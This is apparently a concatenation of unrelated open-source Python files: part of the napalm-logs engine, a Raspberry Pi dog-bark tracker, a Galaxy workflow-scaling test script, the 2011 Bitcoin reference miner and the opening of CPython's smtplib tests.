config = {}
log.debug('Reading configuration from %s', path)
if not os.path.isdir(path):
msg = (
'Unable to read from {path}: ' 'the directory does not exist!'
).format(path=path)
log.error(msg)
raise IOError(msg)
# The directory tree should look like the following:
# .
# ├── __init__.py
# ├── eos
# │ └── init.yml
# ├── iosxr
# │ └── __init__.py
# ├── junos
# │ └── init.yml
# │ └── bgp_read_message.py
# │ └── BGP_PREFIX_THRESH_EXCEEDED.py
# └── nxos
# └── init.yml
os_subdirs = [sdpath[0] for sdpath in os.walk(path)][1:]
if not os_subdirs:
log.error('%s does not contain any OS subdirectories', path)
for os_dir in os_subdirs:
os_name = os.path.split(os_dir)[1] # the network OS name
if os_name.startswith('__'):
log.debug('Ignoring %s', os_name)
continue
if not self._whitelist_blacklist(os_name):
log.debug(
'Not building config for %s (whitelist-blacklist logic)', os_name
)
# Ignore devices that are not in the whitelist (if defined),
# or those operating systems that are on the blacklist.
# This way we can prevent starting unwanted sub-processes.
continue
log.debug('Building config for %s:', os_name)
log.debug('=' * 40)
if os_name not in config:
config[os_name] = {}
files = os.listdir(os_dir)
# Read all files under the OS dir
for file_ in files:
log.debug('Inspecting %s', file_)
file_name, file_extension = os.path.splitext(file_)
file_extension = file_extension.replace('.', '')
filepath = os.path.join(os_dir, file_)
comment = ''
if file_extension in ('yml', 'yaml'):
try:
log.debug('Loading %s as YAML', file_)
with open(filepath, 'r') as fstream:
cfg = yaml.load(fstream, Loader=yaml.FullLoader)
# Reposition at the top and read the comments.
if file_name not in CONFIG.OS_INIT_FILENAMES:
# If the file name is not a profile init.
fstream.seek(0)
comment = self._extract_yaml_docstring(fstream)
if 'messages' in cfg:
for message in cfg['messages']:
message['__doc__'] = comment
napalm_logs.utils.dictupdate(config[os_name], cfg)
except yaml.YAMLError as yamlexc:
log.error('Invalid YAML file: %s', filepath, exc_info=True)
if file_name in CONFIG.OS_INIT_FILENAMES:
# Raise exception and break only when the init file is borked
# otherwise, it will try loading best efforts.
raise IOError(yamlexc)
elif file_extension == 'py':
log.debug('Lazy loading Python module %s', file_)
mod_fp, mod_file, mod_data = imp.find_module(file_name, [os_dir])
mod = imp.load_module(file_name, mod_fp, mod_file, mod_data)
if file_name in CONFIG.OS_INIT_FILENAMES:
# Init file defined as Python module
log.debug('%s seems to be a Python profile', filepath)
# Init files require to define the `extract` function.
# Sample init file:
# def extract(message):
# return {'tag': 'A_TAG', 'host': 'hostname'}
if hasattr(mod, CONFIG.INIT_RUN_FUN) and hasattr(
getattr(mod, CONFIG.INIT_RUN_FUN), '__call__'
):
# if extract is defined and is callable
if 'prefixes' not in config[os_name]:
config[os_name]['prefixes'] = []
config[os_name]['prefixes'].append(
{
'values': {'tag': ''},
'line': '',
'__python_fun__': getattr(mod, CONFIG.INIT_RUN_FUN),
'__python_mod__': filepath, # Will be used for debugging
}
)
log.info(
'Adding the prefix function defined under %s to %s',
filepath,
os_name,
)
elif file_name != '__init__':
# If __init__.py does not have the extractor function, no problem.
log.warning(
'%s does not have the "%s" function defined. Ignoring.',
filepath,
CONFIG.INIT_RUN_FUN,
)
else:
# Other python files require the `emit` function.
if hasattr(mod, '__tag__'):
mod_tag = getattr(mod, '__tag__')
else:
log.info(
'%s does not have __tag__, defaulting the tag to %s',
filepath,
file_name,
)
mod_tag = file_name
if hasattr(mod, '__error__'):
mod_err = getattr(mod, '__error__')
else:
log.info(
'%s does not have __error__, defaulting the error to %s',
filepath,
file_name,
)
mod_err = file_name
if hasattr(mod, '__match_on__'):
err_match = getattr(mod, '__match_on__')
else:
err_match = 'tag'
model = CONFIG.OPEN_CONFIG_NO_MODEL
if hasattr(mod, '__yang_model__'):
model = getattr(mod, '__yang_model__')
log.debug('Matching on %s', err_match)
if hasattr(mod, CONFIG.CONFIG_RUN_FUN) and hasattr(
getattr(mod, CONFIG.CONFIG_RUN_FUN), '__call__'
):
log.debug(
'Adding %s with tag:%s, error:%s, matching on:%s',
file_,
mod_tag,
mod_err,
err_match,
)
# the structure below must correspond to the VALID_CONFIG structure enforcement
if 'messages' not in config[os_name]:
config[os_name]['messages'] = []
config[os_name]['messages'].append(
{
'tag': mod_tag,
'error': mod_err,
'match_on': err_match,
'__doc__': mod.__doc__,
'__python_fun__': getattr(
mod, CONFIG.CONFIG_RUN_FUN
),
'__python_mod__': filepath, # Will be used for debugging
'line': '',
'model': model,
'values': {},
'mapping': {'variables': {}, 'static': {}},
}
)
else:
log.warning(
'%s does not have the "%s" function defined. Ignoring.',
filepath,
CONFIG.CONFIG_RUN_FUN,
)
else:
log.info('Ignoring %s (extension not allowed)', filepath)
log.debug('-' * 40)
if not config:
msg = 'Could not find proper configuration files under {path}'.format(
path=path
)
log.error(msg)
raise IOError(msg)
log.debug('Complete config:')
log.debug(config)
log.debug('Config size in bytes: %d', sys.getsizeof(config))
return config
@staticmethod
def _raise_config_exception(error_string):
log.error(error_string, exc_info=True)
raise ConfigurationException(error_string)
def _compare_values(self, value, config, dev_os, key_path):
if (
'line' not in value
or 'values' not in value
or '__python_fun__' not in value
): # Check looks good when using a Python-defined profile.
return
from_line = re.findall(r'\{(\w+)\}', config['line'])
if set(from_line) == set(config['values']):
return
if config.get('error'):
error = 'The "values" do not match variables in "line" for {}:{} in {}'.format(
':'.join(key_path), config.get('error'), dev_os
)
else:
error = 'The "values" do not match variables in "line" for {} in {}'.format(
':'.join(key_path), dev_os
)
self._raise_config_exception(error)
def _verify_config_key(self, key, value, valid, config, dev_os, key_path):
key_path.append(key)
if config.get(key, False) is False:
self._raise_config_exception(
'Unable to find key "{}" for {}'.format(':'.join(key_path), dev_os)
)
if isinstance(value, type):
if not isinstance(config[key], value):
self._raise_config_exception(
'Key "{}" for {} should be {}'.format(
':'.join(key_path), dev_os, value
)
)
elif isinstance(value, dict):
if not isinstance(config[key], dict):
self._raise_config_exception(
'Key "{}" for {} should be of type <dict>'.format(
':'.join(key_path), dev_os
)
)
self._verify_config_dict(value, config[key], dev_os, key_path)
# As we have already checked that the config below this point is correct, we know that "line" and "values"
# exist in the config if they are present in the valid config
self._compare_values(value, config[key], dev_os, key_path)
elif isinstance(value, list):
if not isinstance(config[key], list):
self._raise_config_exception(
'Key "{}" for {} should be of type <list>'.format(
':'.join(key_path), dev_os
)
)
for item in config[key]:
self._verify_config_dict(value[0], item, dev_os, key_path)
self._compare_values(value[0], item, dev_os, key_path)
key_path.remove(key)
def _verify_config_dict(self, valid, config, dev_os, key_path=None):
'''
Verify if the config dict is valid.
'''
if not key_path:
key_path = []
for key, value in valid.items():
self._verify_config_key(key, value, valid, config, dev_os, key_path)
def _verify_config(self):
'''
Verify that the config is correct
'''
if not self.config_dict:
self._raise_config_exception('No config found')
# Check for device config; if there isn't anything then just log, do not raise an exception
for dev_os, dev_config in self.config_dict.items():
if not dev_config:
log.warning('No config found for %s', dev_os)
continue
# Compare the valid opts with the config
self._verify_config_dict(CONFIG.VALID_CONFIG, dev_config, dev_os)
log.debug('Read the config without error')
def _build_config(self):
'''
Build the config of the napalm syslog parser.
'''
if not self.config_dict:
if not self.config_path:
# No custom config path requested
# Read the native config files
self.config_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'config'
)
log.info('Reading the configuration from %s', self.config_path)
self.config_dict = self._load_config(self.config_path)
if (
not self.extension_config_dict
and self.extension_config_path
and os.path.normpath(self.extension_config_path)
!= os.path.normpath(self.config_path)
): # same path?
# When extension config is not sent as dict
# But `extension_config_path` is specified
log.info(
'Reading extension configuration from %s', self.extension_config_path
)
self.extension_config_dict = self._load_config(self.extension_config_path)
if self.extension_config_dict:
napalm_logs.utils.dictupdate(
self.config_dict, self.extension_config_dict
) # deep merge
def _start_auth_proc(self):
'''
Start the authenticator process.
'''
log.debug('Computing the signing key hex')
verify_key = self.__signing_key.verify_key
sgn_verify_hex = verify_key.encode(encoder=nacl.encoding.HexEncoder)
log.debug('Starting the authenticator subprocess')
auth = NapalmLogsAuthProc(
self.certificate,
self.keyfile,
self.__priv_key,
sgn_verify_hex,
self.auth_address,
self.auth_port,
)
proc = Process(target=auth.start)
proc.start()
proc.description = 'Auth process'
log.debug('Started auth process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_lst_proc(self, listener_type, listener_opts):
'''
Start the listener process.
'''
log.debug('Starting the listener process for %s', listener_type)
listener = NapalmLogsListenerProc(
self.opts,
self.address,
self.port,
listener_type,
listener_opts=listener_opts,
)
proc = Process(target=listener.start)
proc.start()
proc.description = 'Listener process'
log.debug('Started listener process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_srv_proc(self, started_os_proc):
'''
Start the server process.
'''
log.debug('Starting the server process')
server = NapalmLogsServerProc(
self.opts, self.config_dict, started_os_proc, buffer=self._buffer
)
proc = Process(target=server.start)
proc.start()
proc.description = 'Server process'
log.debug('Started server process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_pub_px_proc(self):
'''
Start the internal publisher proxy process.
'''
px = NapalmLogsPublisherProxy(self.opts['hwm'])
proc = Process(target=px.start)
proc.start()
proc.description = 'Publisher proxy process'
log.debug('Started pub proxy as %s with PID %s', proc._name, proc.pid)
return proc
def _start_pub_proc(self, publisher_type, publisher_opts, pub_id):
'''
Start the publisher process.
'''
log.debug('Starting the publisher process for %s', publisher_type)
publisher = NapalmLogsPublisherProc(
self.opts,
self.publish_address,
self.publish_port,
publisher_type,
self.serializer,
self.__priv_key,
self.__signing_key,
publisher_opts,
disable_security=self.disable_security,
pub_id=pub_id,
)
proc = Process(target=publisher.start)
proc.start()
proc.description = 'Publisher process'
log.debug('Started publisher process as %s with PID %s', proc._name, proc.pid)
return proc
def _start_dev_proc(self, device_os, device_config):
'''
Start the device worker process.
'''
log.info('Starting the child process for %s', device_os)
dos = NapalmLogsDeviceProc(device_os, self.opts, device_config)
os_proc = Process(target=dos.start)
os_proc.start()
os_proc.description = '%s device process' % device_os
log.debug(
'Started process %s for %s, having PID %s',
os_proc._name,
device_os,
os_proc.pid,
)
return os_proc
def start_engine(self):
'''
Start the child processes (one per device OS)
'''
if self.disable_security is True:
log.warning(
'***Not starting the authenticator process due to disable_security being set to True***'
)
else:
log.debug('Generating the private key')
self.__priv_key = nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE)
log.debug('Generating the signing key')
self.__signing_key = nacl.signing.SigningKey.generate()
# start the keepalive thread for the auth sub-process
self._processes.append(self._start_auth_proc())
log.debug('Starting the internal proxy')
proc = self._start_pub_px_proc()
self._processes.append(proc)
# publisher process start
pub_id = 0
for pub in self.publisher:
publisher_type, publisher_opts = list(pub.items())[0]
proc = self._start_pub_proc(publisher_type, publisher_opts, pub_id)
self._processes.append(proc)
pub_id += 1
# device process start
log.info('Starting child processes for each device type')
started_os_proc = []
for device_os, device_config in self.config_dict.items():
if not self._whitelist_blacklist(device_os):
log.debug(
'Not starting process for %s (whitelist-blacklist logic)', device_os
)
# Ignore devices that are not in the whitelist (if defined),
# or those operating systems that are on the blacklist.
# This way we can prevent starting unwanted sub-processes.
continue
log.debug(
'Will start %d worker process(es) for %s',
self.device_worker_processes,
device_os,
)
for proc_index in range(self.device_worker_processes):
self._processes.append(self._start_dev_proc(device_os, device_config))
started_os_proc.append(device_os)
# start the server process
self._processes.append(self._start_srv_proc(started_os_proc))
# start listener process
for lst in self.listener:
listener_type, listener_opts = list(lst.items())[0]
proc = self._start_lst_proc(listener_type, listener_opts)
self._processes.append(proc)
thread = threading.Thread(target=self._check_children)
thread.start()
def _check_children(self):
'''
Check all of the child processes are still running
'''
while self.up:
time.sleep(1)
for process in self._processes:
if process.is_alive() is True:
continue
log.debug(
'%s is dead. Stopping the napalm-logs engine.', process.description
)
self.stop_engine()
def stop_engine(self):
self.up = False
log.info('Shutting down the engine')
# Set SIGTERM to all child processes, then join them
for proc in self._processes:
proc.terminate()
for proc in self._processes:
proc.join()
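# Usage sketch (hedged: listener/publisher are treated as lists of single-key
# dicts by _post_preparation/start_engine, so pass them in that shape):
# nl = NapalmLogs(
# listener=[{'udp': {}}],
# publisher=[{'zmq': {}}],
# disable_security=True,
# )
# nl.start_engine()
# ... # consume structured messages from the publisher
# nl.stop_engine()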
|
main.py
|
#!/usr/bin/env python3
'''
The main file to run. Process that runs indefinitely, and listens for button presses to start or stop the bark tracking.
'''
import datetime
import time
import signal
import sys
import logging
from threading import Thread, Event, Lock
from aiy.board import Board, Led
import aiy.voice.tts as googlevoice
import settings
from daytime import Daytime
from barkservice import Barksession
from sonosservice import Sonosservice
from lifxservice import Lifxservice
from gmailsender import Gmailsender
logging.basicConfig(filename='/home/pi/logs/barktracker-{}.log'.format(time.strftime("%Y%m%d-%H%M%S")),
format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',
datefmt='%H:%M:%S',
level=logging.INFO)
class ButtonListener(object):
def __init__(self):
self._board = Board()
self._tracker_active = False
self._ui_thread = Thread(target=self._button_listen)
self._debug = settings.DEBUG
self._services = []
self._lock = Lock()
signal.signal(signal.SIGINT, self._shutdown)
def run(self):
self._board.led.state = Led.OFF
self._ui_thread.start()
def _button_listen(self):
self._board.button.when_pressed = lambda : self._toggle_button()
logging.info("BarkTracker is loaded. Press the button to get started.")
if self._debug:
self._toggle_button()
else:
self._board.led.state = Led.BLINK
time.sleep(10)
self._board.led.state = Led.OFF
Event().wait()
def _toggle_button(self):
if self._tracker_active:
self._stop_tracker()
else:
self._start_tracker()
def _start_tracker(self):
logging.info("Tracker started.")
self._board.led.state = Led.ON
self._tracker_active = True
if not self._debug:
googlevoice.say('Starting Barktracker.')
time.sleep(2)
self._lock.acquire()
self._services = create_services()
for service in self._services:
try:
bg_thread = Thread(target=service.start)
bg_thread.start()
except Exception as e:
logging.error("Could not start service of class {}. Error: {}".format(service.__class__.__name__, e))
self._lock.release()
def _stop_tracker(self):
logging.info("Tracker stopped.")
self._board.led.state = Led.OFF
self._tracker_active = False
summaries = []
self._lock.acquire()
for service in self._services:
try:
service.stop()
summaries.append(service.generate_summary())
except Exception as e:
logging.error("Could not stop service of class {}. Error: {}".format(service.__class__.__name__, e))
self._services = None
self._lock.release()
if not self._debug:
googlevoice.say(
"Good {}. Welcome back. Here's your summary: ".format(Daytime.part_of_day()))
for summary in filter(None, summaries):
logging.info(summary)
googlevoice.say(summary)
def _shutdown(self, sig, frame):
self._board.led.state = Led.OFF
sys.exit(0)
def create_services():
gmail_sender = Gmailsender(settings.GMAIL_USER,
settings.GMAIL_PASSWORD,
from_name=settings.FROM_NAME,
from_email=settings.FROM_EMAIL,
debug=settings.DEBUG)
bark_tracker = Barksession(
dog=settings.DOG,
gmail_sender=gmail_sender,
recipients=settings.RECIPIENTS,
use_ai=settings.USE_AI,
ai_labels=settings.AI_LABELS,
bark_label=settings.BARK_LABEL,
ai_graph=settings.AI_GRAPH,
ambient_db=settings.AMBIENT_DB,
debug=settings.DEBUG)
sonos_service = Sonosservice(debug=settings.DEBUG)
lifx_service = Lifxservice(location=settings.LOCATION,
debug=settings.DEBUG)
return [bark_tracker, sonos_service, lifx_service]
def main():
ButtonListener().run()
if __name__ == '__main__':
print("Initializing BarkTracker ...")
main()
|
workflows_scaling.py
|
#!/usr/bin/env python
"""A small script to drive workflow performance testing.
% ./test/manual/launch_and_run.sh workflows_scaling --collection_size 500 --workflow_depth 4
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Workflow step'
$ .venv/bin/python scripts/summarize_timings.py --file /tmp/<work_dir>/handler1.log --pattern 'Created step'
"""
import functools
import json
import os
import random
import sys
from argparse import ArgumentParser
from threading import Thread
from uuid import uuid4
from bioblend import galaxy
galaxy_root = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
sys.path[1:1] = [os.path.join(galaxy_root, "lib"), os.path.join(galaxy_root, "test")]
from base.populators import ( # noqa: I100
GiDatasetCollectionPopulator,
GiDatasetPopulator,
GiWorkflowPopulator,
)
from api.workflows_format_2.converter import python_to_workflow # noqa: I100
LONG_TIMEOUT = 1000000000
DESCRIPTION = "Script to exercise the workflow engine."
def main(argv=None):
"""Entry point for workflow driving."""
arg_parser = ArgumentParser(description=DESCRIPTION)
arg_parser.add_argument("--api_key", default="testmasterapikey")
arg_parser.add_argument("--host", default="http://localhost:8080/")
arg_parser.add_argument("--collection_size", type=int, default=20)
arg_parser.add_argument("--schedule_only_test", default=False, action="store_true")
arg_parser.add_argument("--workflow_depth", type=int, default=10)
arg_parser.add_argument("--workflow_count", type=int, default=1)
group = arg_parser.add_mutually_exclusive_group()
group.add_argument("--two_outputs", default=False, action="store_true")
group.add_argument("--wave_simple", default=False, action="store_true")
args = arg_parser.parse_args(argv)
uuid = str(uuid4())
workflow_struct = _workflow_struct(args, uuid)
has_input = any([s.get("type", "tool") == "input_collection" for s in workflow_struct])
if not has_input:
uuid = None
gi = _gi(args)
workflow = python_to_workflow(workflow_struct)
workflow_info = gi.workflows.import_workflow_json(workflow)
workflow_id = workflow_info["id"]
target = functools.partial(_run, args, gi, workflow_id, uuid)
threads = []
for i in range(args.workflow_count):
t = Thread(target=target)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
def _run(args, gi, workflow_id, uuid):
dataset_populator = GiDatasetPopulator(gi)
dataset_collection_populator = GiDatasetCollectionPopulator(gi)
history_id = dataset_populator.new_history()
if uuid is not None:
contents = []
for i in range(args.collection_size):
contents.append("random dataset number #%d" % i)
hdca = dataset_collection_populator.create_list_in_history(history_id, contents=contents).json()
label_map = {
uuid: {"src": "hdca", "id": hdca["id"]},
}
else:
label_map = {}
workflow_request = dict(
history="hist_id=%s" % history_id,
)
workflow_request["inputs"] = json.dumps(label_map)
url = "workflows/%s/usage" % (workflow_id)
invoke_response = dataset_populator._post(url, data=workflow_request).json()
invocation_id = invoke_response["id"]
workflow_populator = GiWorkflowPopulator(gi)
if args.schedule_only_test:
workflow_populator.wait_for_invocation(
workflow_id,
invocation_id,
timeout=LONG_TIMEOUT,
)
else:
workflow_populator.wait_for_workflow(
workflow_id,
invocation_id,
history_id,
timeout=LONG_TIMEOUT,
)
def _workflow_struct(args, input_uuid):
if args.two_outputs:
return _workflow_struct_two_outputs(args, input_uuid)
elif args.wave_simple:
return _workflow_struct_wave(args, input_uuid)
else:
return _workflow_struct_simple(args, input_uuid)
def _workflow_struct_simple(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link = str(i + 1) + "#out_file1"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link)}}
)
return workflow_struct
def _workflow_struct_two_outputs(args, input_uuid):
workflow_struct = [
{"type": "input_collection", "uuid": input_uuid},
{"tool_id": "cat", "state": {"input1": _link(0), "input2": _link(0)}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
link1 = str(i + 1) + "#out_file1"
link2 = str(i + 1) + "#out_file2"
workflow_struct.append(
{"tool_id": "cat", "state": {"input1": _link(link1), "input2": _link(link2)}}
)
return workflow_struct
def _workflow_struct_wave(args, input_uuid):
workflow_struct = [
{"tool_id": "create_input_collection", "state": {"collection_size": args.collection_size}},
{"tool_id": "cat_list", "state": {"input1": _link(0, "output")}}
]
workflow_depth = args.workflow_depth
for i in range(workflow_depth):
step = i + 2
if step % 2 == 1:
workflow_struct += [{"tool_id": "cat_list", "state": {"input1": _link(step - 1, "output")}}]
else:
workflow_struct += [{"tool_id": "split", "state": {"input1": _link(step - 1, "out_file1")}}]
return workflow_struct
def _link(link, output_name=None):
if output_name is not None:
link = str(link) + "#" + output_name
return {"$link": link}
def _gi(args):
gi = galaxy.GalaxyInstance(args.host, key=args.api_key)
name = "wftest-user-%d" % random.randint(0, 1000000)
user = gi.users.create_local_user(name, "%s@galaxytesting.dev" % name, "pass123")
user_id = user["id"]
api_key = gi.users.create_user_apikey(user_id)
user_gi = galaxy.GalaxyInstance(args.host, api_key)
return user_gi
if __name__ == "__main__":
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
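# Illustrative behaviour of the helpers above: bytereverse(0x12345678) == 0x78563412;
# bufreverse swaps the bytes inside each 32-bit word of a buffer, while
# wordreverse reverses the order of the 32-bit words themselves.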
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 10052
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import unittest
from test import support, mock_socket
try:
import threading
except ImportError:
threading = None
HOST = support.HOST
if sys.platform == 'darwin':
# select.poll returns a select.POLLHUP at the end of the tests
# on darwin, so just ignore it
def handle_expt(self):
pass
smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
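# One-shot helper: signal readiness via 'evt', accept a single connection,
# and stream 'buf' to it before shutting down.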
serv.listen()
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
class GeneralTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
self.port = 25
def tearDown(self):
smtplib.socket = socket
# This method is no longer used but is retained for backward compatibility,
# so test to make sure it still works.
def testQuoteData(self):
teststr = "abc\n.jkl\rfoo\r\n..blue"
expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
self.assertEqual(expected, smtplib.quotedata(teststr))
def testBasic1(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testSourceAddress(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects
smtp = smtplib.SMTP(HOST, self.port,
source_address=('127.0.0.1',19876))
self.assertEqual(smtp.source_address, ('127.0.0.1', 19876))
smtp.close()
def testBasic2(self):
mock_socket.reply_with(b"220 Hola mundo")
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
mock_socket.reply_with(b"220 Hola mundo")
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(mock_socket.getdefaulttimeout())
mock_socket.setdefaulttimeout(30)
self.assertEqual(mock_socket.getdefaulttimeout(), 30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
mock_socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
mock_socket.reply_with(b"220 Hola mundo")
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
mock_socket.reply_with(b"220 Hola mundo")
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def test_debuglevel(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(1)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^connect:", re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
def test_debuglevel_2(self):
mock_socket.reply_with(b"220 Hello world")
smtp = smtplib.SMTP()
smtp.set_debuglevel(2)
with support.captured_stderr() as stderr:
smtp.connect(HOST, self.port)
smtp.close()
expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
re.MULTILINE)
self.assertRegex(stderr.getvalue(), expected)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
